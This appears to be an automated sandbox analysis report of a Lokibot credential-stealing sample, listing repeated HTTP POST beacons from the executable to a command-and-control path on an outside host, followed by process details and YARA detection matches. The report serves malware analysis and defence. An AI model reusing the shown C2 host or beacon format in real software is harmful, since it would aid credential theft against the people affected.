              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:56.498845100 CET1537INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:36 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.649797185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:59.460407019 CET1545OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:00.863837957 CET1545INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:41 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.649802185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:02.169111967 CET3128OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:03.551551104 CET10282INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:44 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.649818185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:06.424436092 CET10554OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:07.849755049 CET10771INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:48 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.649830185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:10.077239037 CET10784OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:11.381908894 CET12486INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:51 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.649840185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:12.712441921 CET12493OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:14.111047983 CET12494INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:54 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.649771185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:14.709347010 CET1243OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:16.117796898 CET1343INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:56 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.649841185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:17.281043053 CET12494OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:18.654022932 CET12495INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:59 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.649842185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:20.171529055 CET12496OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:21.628648043 CET12496INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.649845185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:23.240806103 CET12504OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:24.676434040 CET12504INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:05 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.649850185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:27.482882977 CET12520OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:28.925374031 CET12521INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:09 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.649851185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:31.054519892 CET12521OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:32.352724075 CET12522INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:12 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.649852185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:33.510654926 CET12523OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:35.007775068 CET12524INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:15 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.649854185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:37.134931087 CET12525OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:38.454946995 CET12534INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:19 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.649855185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:40.133790970 CET12535OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:41.392921925 CET12542INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:21 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.649862185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:42.445022106 CET12553OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:43.841937065 CET12567INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:24 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.649870185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:46.720808029 CET12578OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:48.177226067 CET12591INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:28 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.649773185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:17.458668947 CET1344OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:18.890583992 CET1344INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:59 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.649881185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:49.452650070 CET12601OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:50.674108982 CET12602INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:31 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.649882185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:52.315956116 CET12602OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:53.689454079 CET12603INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:34 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.649883185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:54.799525976 CET12604OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:56.145380974 CET12604INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:36 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.649885185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:38:57.255335093 CET12606OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:58.636996984 CET12613INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:39 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.649886185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:39:00.138022900 CET12613OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:39:01.668778896 CET12614INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:41 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.649774185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:20.261991978 CET1345OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:21.668706894 CET1346INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.649775185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:22.809911013 CET1346OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:24.212196112 CET1347INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:04 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.649776185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:25.398463011 CET1348OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:26.758080006 CET1348INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:07 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.649779185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:29.263305902 CET1372OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:30.738581896 CET1373INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:11 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.649780185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:33.962521076 CET1373OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:35.373624086 CET1381INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:15 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.649782185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:36.594727993 CET1382OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:37.913034916 CET1382INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:18 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:23:36:56
              Start date:28/01/2022
              Path:C:\Users\user\Desktop\kVijllv0Yl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
              Imagebase:0x400000
              File size:247353 bytes
              MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              General

              Target ID:1
              Start time:23:36:58
              Start date:28/01/2022
              Path:C:\Users\user\Desktop\kVijllv0Yl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
              Imagebase:0x400000
              File size:247353 bytes
              MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
